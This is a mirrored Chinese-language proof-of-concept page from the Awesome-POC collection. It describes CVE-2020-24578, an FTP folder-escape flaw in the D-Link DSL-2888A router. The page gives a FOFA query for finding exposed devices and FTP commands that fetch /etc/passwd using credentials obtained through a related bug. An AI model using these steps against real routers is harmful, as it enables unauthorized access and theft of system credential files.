admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/D-Link DSL-28881A FTP配置错误 CVE-2020-24578.md

33 lines
870 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# D-Link DSL-28881A FTP配置错误 CVE-2020-24578
## 漏洞描述
D-Link DSL-2888A路由器具有文件共享功能该功能允许用户通过将外部驱动器插入路由器来与其他网络用户共享文件。然后通过FTP文件传输协议共享。但是FTP服务允许网络用户转义共享文件夹以访问路由器文件系统并下载位于根文件夹中的其他文件。
## 漏洞影响
```
D-Link DSL-2888A
```
## FOFA
```
body="DSL-2888A"
```
## 漏洞复现
前提为使用 **D-Link DSL-28881A 信息泄露 CVE-2020-24577** 获取FTP凭证
以下提供了下载“ passwd”的示例
在FTP客户端上使用以下命令以有效的凭据从Finding-2获得连接到FTP服务。
使用以下命令导航到根文件夹。
```plain
ftp xxx.xxx.xxx.xxx
ftp> cd etc
ftp> get passwd
```
更新漏洞
2022-12-05 11:09:28 +08:00
![](./images/202202162225017.png)
Reference in New Issue Copy Permalink